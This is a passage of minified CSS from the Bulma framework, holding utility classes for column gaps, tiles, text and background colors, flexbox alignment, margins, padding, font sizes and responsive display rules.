1023px){.columns.is-variable.is-1-touch{--columnGap: .25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-1-desktop{--columnGap: .25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-1-desktop-only{--columnGap: .25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-1-widescreen{--columnGap: .25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-1-widescreen-only{--columnGap: .25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-1-fullhd{--columnGap: .25rem}}.columns.is-variable.is-2{--columnGap: .5rem}@media screen and (max-width: 768px){.columns.is-variable.is-2-mobile{--columnGap: .5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-2-tablet{--columnGap: .5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-2-tablet-only{--columnGap: .5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-2-touch{--columnGap: .5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-2-desktop{--columnGap: .5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-2-desktop-only{--columnGap: .5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-2-widescreen{--columnGap: .5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-2-widescreen-only{--columnGap: .5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-2-fullhd{--columnGap: .5rem}}.columns.is-variable.is-3{--columnGap: .75rem}@media screen and (max-width: 768px){.columns.is-variable.is-3-mobile{--columnGap: .75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-3-tablet{--columnGap: .75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-3-tablet-only{--columnGap: .75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-3-touch{--columnGap: .75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-3-desktop{--columnGap: .75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-3-desktop-only{--columnGap: .75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-3-widescreen{--columnGap: .75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-3-widescreen-only{--columnGap: .75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-3-fullhd{--columnGap: .75rem}}.columns.is-variable.is-4{--columnGap: 1rem}@media screen and (max-width: 768px){.columns.is-variable.is-4-mobile{--columnGap: 1rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-4-tablet{--columnGap: 1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-4-tablet-only{--columnGap: 1rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-4-touch{--columnGap: 1rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-4-desktop{--columnGap: 1rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-4-desktop-only{--columnGap: 1rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-4-widescreen{--columnGap: 1rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-4-widescreen-only{--columnGap: 1rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-4-fullhd{--columnGap: 1rem}}.columns.is-variable.is-5{--columnGap: 1.25rem}@media screen and (max-width: 768px){.columns.is-variable.is-5-mobile{--columnGap: 1.25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-5-tablet{--columnGap: 1.25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-5-tablet-only{--columnGap: 1.25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-5-touch{--columnGap: 1.25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-5-desktop{--columnGap: 1.25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-5-desktop-only{--columnGap: 1.25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-5-widescreen{--columnGap: 1.25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-5-widescreen-only{--columnGap: 1.25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-5-fullhd{--columnGap: 1.25rem}}.columns.is-variable.is-6{--columnGap: 1.5rem}@media screen and (max-width: 768px){.columns.is-variable.is-6-mobile{--columnGap: 1.5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-6-tablet{--columnGap: 1.5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-6-tablet-only{--columnGap: 1.5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-6-touch{--columnGap: 1.5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-6-desktop{--columnGap: 1.5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-6-desktop-only{--columnGap: 1.5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-6-widescreen{--columnGap: 1.5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-6-widescreen-only{--columnGap: 1.5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-6-fullhd{--columnGap: 1.5rem}}.columns.is-variable.is-7{--columnGap: 1.75rem}@media screen and (max-width: 768px){.columns.is-variable.is-7-mobile{--columnGap: 1.75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-7-tablet{--columnGap: 1.75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-7-tablet-only{--columnGap: 1.75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-7-touch{--columnGap: 1.75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-7-desktop{--columnGap: 1.75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-7-desktop-only{--columnGap: 1.75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-7-widescreen{--columnGap: 1.75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-7-widescreen-only{--columnGap: 1.75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-7-fullhd{--columnGap: 1.75rem}}.columns.is-variable.is-8{--columnGap: 2rem}@media screen and (max-width: 768px){.columns.is-variable.is-8-mobile{--columnGap: 2rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-8-tablet{--columnGap: 2rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-8-tablet-only{--columnGap: 2rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-8-touch{--columnGap: 2rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-8-desktop{--columnGap: 2rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-8-desktop-only{--columnGap: 2rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-8-widescreen{--columnGap: 2rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-8-widescreen-only{--columnGap: 2rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-8-fullhd{--columnGap: 2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and (min-width: 769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.has-text-white{color:#fff!important}a.has-text-white:hover,a.has-text-white:focus{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:hover,a.has-text-black:focus{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:hover,a.has-text-light:focus{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:hover,a.has-text-dark:focus{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:hover,a.has-text-primary:focus{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-primary-light{color:#ebfffc!important}a.has-text-primary-light:hover,a.has-text-primary-light:focus{color:#b8fff4!important}.has-background-primary-light{background-color:#ebfffc!important}.has-text-primary-dark{color:#00947e!important}a.has-text-primary-dark:hover,a.has-text-primary-dark:focus{color:#00c7a9!important}.has-background-primary-dark{background-color:#00947e!important}.has-text-link{color:#485fc7!important}a.has-text-link:hover,a.has-text-link:focus{color:#3449a8!important}.has-background-link{background-color:#485fc7!important}.has-text-link-light{color:#eff1fa!important}a.has-text-link-light:hover,a.has-text-link-light:focus{color:#c8cfee!important}.has-background-link-light{background-color:#eff1fa!important}.has-text-link-dark{color:#3850b7!important}a.has-text-link-dark:hover,a.has-text-link-dark:focus{color:#576dcb!important}.has-background-link-dark{background-color:#3850b7!important}.has-text-info{color:#3e8ed0!important}a.has-text-info:hover,a.has-text-info:focus{color:#2b74b1!important}.has-background-info{background-color:#3e8ed0!important}.has-text-info-light{color:#eff5fb!important}a.has-text-info-light:hover,a.has-text-info-light:focus{color:#c6ddf1!important}.has-background-info-light{background-color:#eff5fb!important}.has-text-info-dark{color:#296fa8!important}a.has-text-info-dark:hover,a.has-text-info-dark:focus{color:#368ace!important}.has-background-info-dark{background-color:#296fa8!important}.has-text-success{color:#48c78e!important}a.has-text-success:hover,a.has-text-success:focus{color:#34a873!important}.has-background-success{background-color:#48c78e!important}.has-text-success-light{color:#effaf5!important}a.has-text-success-light:hover,a.has-text-success-light:focus{color:#c8eedd!important}.has-background-success-light{background-color:#effaf5!important}.has-text-success-dark{color:#257953!important}a.has-text-success-dark:hover,a.has-text-success-dark:focus{color:#31a06e!important}.has-background-success-dark{background-color:#257953!important}.has-text-warning{color:#ffe08a!important}a.has-text-warning:hover,a.has-text-warning:focus{color:#ffd257!important}.has-background-warning{background-color:#ffe08a!important}.has-text-warning-light{color:#fffaeb!important}a.has-text-warning-light:hover,a.has-text-warning-light:focus{color:#ffecb8!important}.has-background-warning-light{background-color:#fffaeb!important}.has-text-warning-dark{color:#946c00!important}a.has-text-warning-dark:hover,a.has-text-warning-dark:focus{color:#c79200!important}.has-background-warning-dark{background-color:#946c00!important}.has-text-danger{color:#f14668!important}a.has-text-danger:hover,a.has-text-danger:focus{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-danger-light{color:#feecf0!important}a.has-text-danger-light:hover,a.has-text-danger-light:focus{color:#fabdc9!important}.has-background-danger-light{background-color:#feecf0!important}.has-text-danger-dark{color:#cc0f35!important}a.has-text-danger-dark:hover,a.has-text-danger-dark:focus{color:#ee2049!important}.has-background-danger-dark{background-color:#cc0f35!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.is-flex-direction-row{flex-direction:row!important}.is-flex-direction-row-reverse{flex-direction:row-reverse!important}.is-flex-direction-column{flex-direction:column!important}.is-flex-direction-column-reverse{flex-direction:column-reverse!important}.is-flex-wrap-nowrap{flex-wrap:nowrap!important}.is-flex-wrap-wrap{flex-wrap:wrap!important}.is-flex-wrap-wrap-reverse{flex-wrap:wrap-reverse!important}.is-justify-content-flex-start{justify-content:flex-start!important}.is-justify-content-flex-end{justify-content:flex-end!important}.is-justify-content-center{justify-content:center!important}.is-justify-content-space-between{justify-content:space-between!important}.is-justify-content-space-around{justify-content:space-around!important}.is-justify-content-space-evenly{justify-content:space-evenly!important}.is-justify-content-start{justify-content:start!important}.is-justify-content-end{justify-content:end!important}.is-justify-content-left{justify-content:left!important}.is-justify-content-right{justify-content:right!important}.is-align-content-flex-start{align-content:flex-start!important}.is-align-content-flex-end{align-content:flex-end!important}.is-align-content-center{align-content:center!important}.is-align-content-space-between{align-content:space-between!important}.is-align-content-space-around{align-content:space-around!important}.is-align-content-space-evenly{align-content:space-evenly!important}.is-align-content-stretch{align-content:stretch!important}.is-align-content-start{align-content:start!important}.is-align-content-end{align-content:end!important}.is-align-content-baseline{align-content:baseline!important}.is-align-items-stretch{align-items:stretch!important}.is-align-items-flex-start{align-items:flex-start!important}.is-align-items-flex-end{align-items:flex-end!important}.is-align-items-center{align-items:center!important}.is-align-items-baseline{align-items:baseline!important}.is-align-items-start{align-items:start!important}.is-align-items-end{align-items:end!important}.is-align-items-self-start{align-items:self-start!important}.is-align-items-self-end{align-items:self-end!important}.is-align-self-auto{align-self:auto!important}.is-align-self-flex-start{align-self:flex-start!important}.is-align-self-flex-end{align-self:flex-end!important}.is-align-self-center{align-self:center!important}.is-align-self-baseline{align-self:baseline!important}.is-align-self-stretch{align-self:stretch!important}.is-flex-grow-0{flex-grow:0!important}.is-flex-grow-1{flex-grow:1!important}.is-flex-grow-2{flex-grow:2!important}.is-flex-grow-3{flex-grow:3!important}.is-flex-grow-4{flex-grow:4!important}.is-flex-grow-5{flex-grow:5!important}.is-flex-shrink-0{flex-shrink:0!important}.is-flex-shrink-1{flex-shrink:1!important}.is-flex-shrink-2{flex-shrink:2!important}.is-flex-shrink-3{flex-shrink:3!important}.is-flex-shrink-4{flex-shrink:4!important}.is-flex-shrink-5{flex-shrink:5!important}.is-clearfix:after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-clickable{cursor:pointer!important;pointer-events:all!important}.is-clipped{overflow:hidden!important}.is-relative{position:relative!important}.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.m-0{margin:0!important}.mt-0{margin-top:0!important}.mr-0{margin-right:0!important}.mb-0{margin-bottom:0!important}.ml-0{margin-left:0!important}.mx-0{margin-left:0!important;margin-right:0!important}.my-0{margin-top:0!important;margin-bottom:0!important}.m-1{margin:.25rem!important}.mt-1{margin-top:.25rem!important}.mr-1{margin-right:.25rem!important}.mb-1{margin-bottom:.25rem!important}.ml-1{margin-left:.25rem!important}.mx-1{margin-left:.25rem!important;margin-right:.25rem!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.m-2{margin:.5rem!important}.mt-2{margin-top:.5rem!important}.mr-2{margin-right:.5rem!important}.mb-2{margin-bottom:.5rem!important}.ml-2{margin-left:.5rem!important}.mx-2{margin-left:.5rem!important;margin-right:.5rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.m-3{margin:.75rem!important}.mt-3{margin-top:.75rem!important}.mr-3{margin-right:.75rem!important}.mb-3{margin-bottom:.75rem!important}.ml-3{margin-left:.75rem!important}.mx-3{margin-left:.75rem!important;margin-right:.75rem!important}.my-3{margin-top:.75rem!important;margin-bottom:.75rem!important}.m-4{margin:1rem!important}.mt-4{margin-top:1rem!important}.mr-4{margin-right:1rem!important}.mb-4{margin-bottom:1rem!important}.ml-4{margin-left:1rem!important}.mx-4{margin-left:1rem!important;margin-right:1rem!important}.my-4{margin-top:1rem!important;margin-bottom:1rem!important}.m-5{margin:1.5rem!important}.mt-5{margin-top:1.5rem!important}.mr-5{margin-right:1.5rem!important}.mb-5{margin-bottom:1.5rem!important}.ml-5{margin-left:1.5rem!important}.mx-5{margin-left:1.5rem!important;margin-right:1.5rem!important}.my-5{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.m-6{margin:3rem!important}.mt-6{margin-top:3rem!important}.mr-6{margin-right:3rem!important}.mb-6{margin-bottom:3rem!important}.ml-6{margin-left:3rem!important}.mx-6{margin-left:3rem!important;margin-right:3rem!important}.my-6{margin-top:3rem!important;margin-bottom:3rem!important}.m-auto{margin:auto!important}.mt-auto{margin-top:auto!important}.mr-auto{margin-right:auto!important}.mb-auto{margin-bottom:auto!important}.ml-auto{margin-left:auto!important}.mx-auto{margin-left:auto!important;margin-right:auto!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.p-0{padding:0!important}.pt-0{padding-top:0!important}.pr-0{padding-right:0!important}.pb-0{padding-bottom:0!important}.pl-0{padding-left:0!important}.px-0{padding-left:0!important;padding-right:0!important}.py-0{padding-top:0!important;padding-bottom:0!important}.p-1{padding:.25rem!important}.pt-1{padding-top:.25rem!important}.pr-1{padding-right:.25rem!important}.pb-1{padding-bottom:.25rem!important}.pl-1{padding-left:.25rem!important}.px-1{padding-left:.25rem!important;padding-right:.25rem!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.p-2{padding:.5rem!important}.pt-2{padding-top:.5rem!important}.pr-2{padding-right:.5rem!important}.pb-2{padding-bottom:.5rem!important}.pl-2{padding-left:.5rem!important}.px-2{padding-left:.5rem!important;padding-right:.5rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.p-3{padding:.75rem!important}.pt-3{padding-top:.75rem!important}.pr-3{padding-right:.75rem!important}.pb-3{padding-bottom:.75rem!important}.pl-3{padding-left:.75rem!important}.px-3{padding-left:.75rem!important;padding-right:.75rem!important}.py-3{padding-top:.75rem!important;padding-bottom:.75rem!important}.p-4{padding:1rem!important}.pt-4{padding-top:1rem!important}.pr-4{padding-right:1rem!important}.pb-4{padding-bottom:1rem!important}.pl-4{padding-left:1rem!important}.px-4{padding-left:1rem!important;padding-right:1rem!important}.py-4{padding-top:1rem!important;padding-bottom:1rem!important}.p-5{padding:1.5rem!important}.pt-5{padding-top:1.5rem!important}.pr-5{padding-right:1.5rem!important}.pb-5{padding-bottom:1.5rem!important}.pl-5{padding-left:1.5rem!important}.px-5{padding-left:1.5rem!important;padding-right:1.5rem!important}.py-5{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.p-6{padding:3rem!important}.pt-6{padding-top:3rem!important}.pr-6{padding-right:3rem!important}.pb-6{padding-bottom:3rem!important}.pl-6{padding-left:3rem!important}.px-6{padding-left:3rem!important;padding-right:3rem!important}.py-6{padding-top:3rem!important;padding-bottom:3rem!important}.p-auto{padding:auto!important}.pt-auto{padding-top:auto!important}.pr-auto{padding-right:auto!important}.pb-auto{padding-bottom:auto!important}.pl-auto{padding-left:auto!important}.px-auto{padding-left:auto!important;padding-right:auto!important}.py-auto{padding-top:auto!important;padding-bottom:auto!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width: 768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width: 769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width: 1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width: 1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and (min-width: 1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}@media screen and (min-width: 1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width: 768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width: 769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width: 1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width: 1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width: 1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width: 1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width: 768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and (min-width: 769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width: 1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width: 1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width: 1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width: 1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width: 768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width: 769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width: 1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width: 1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width: 1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width: 1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width: 768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width: 769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width: 1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width: 1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width: 1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width: 1408px){.has-text-right-fullhd{text-align:right!important}}.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.is-underlined{text-decoration:underline!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary,.is-family-secondary,.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif!important}.is-family-monospace,.is-family-code{font-family:monospace!important}.is-block{display:block!important}@media screen and (max-width: 768px){.is-block-mobile{display:block!important}}@media screen and (min-width: 769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width: 1023px){.is-block-touch{display:block!important}}@media screen and (min-width: 1024px){.is-block-desktop{display:block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width: 1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width: 1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width: 768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width: 769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width: 1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width: 1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width: 1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-flex-widescreen-only{display:flex!important}}@media screen and (min-width: 1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width: 768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width: 769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width: 1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width: 1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width: 1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width: 1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width: 768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width: 769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width: 1023px){.is-inline-block-touch{display:inline-block!important}}@media screen and (min-width: 1024px){.is-inline-block-desktop{display:inline-block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-block-desktop-only{display:inline-block!important}}@media screen and (min-width: 1216px){.is-inline-block-widescreen{display:inline-block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-block-widescreen-only{display:inline-block!important}}@media screen and (min-width: 1408px){.is-inline-block-fullhd{display:inline-block!important}}.is-inline-flex{display:inline-flex!important}@media screen and (max-width: 768px){.is-inline-flex-mobile{display:inline-flex!important}}@media screen and (min-width: 769px),print{.is-inline-flex-tablet{display:inline-flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-flex-tablet-only{display:inline-flex!important}}@media screen and (max-width: 1023px){.is-inline-flex-touch{display:inline-flex!important}}@media screen and (min-width: 1024px){.is-inline-flex-desktop{display:inline-flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-flex-desktop-only{display:inline-flex!important}}@media screen and (min-width: 1216px){.is-inline-flex-widescreen{display:inline-flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-flex-widescreen-only{display:inline-flex!important}}@media screen and (min-width: 1408px){.is-inline-flex-fullhd{display:inline-flex!important}}.is-hidden{display:none!important}.is-sr-only{border:none!important;clip:rect(0,0,0,0)!important;height:.01em!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:.01em!important}@media screen and (max-width: 768px){.is-hidden-mobile{display:none!important}}@media screen and (min-width: 769px),print{.is-hidden-tablet{display:none!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-hidden-tablet-only{display:none!important}}@media screen and (max-width: 1023px){.is-hidden-touch{display:none!important}}@media screen and (min-width: 1024px){.is-hidden-desktop{display:none!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-hidden-desktop-only{display:none!important}}@media screen and (min-width: 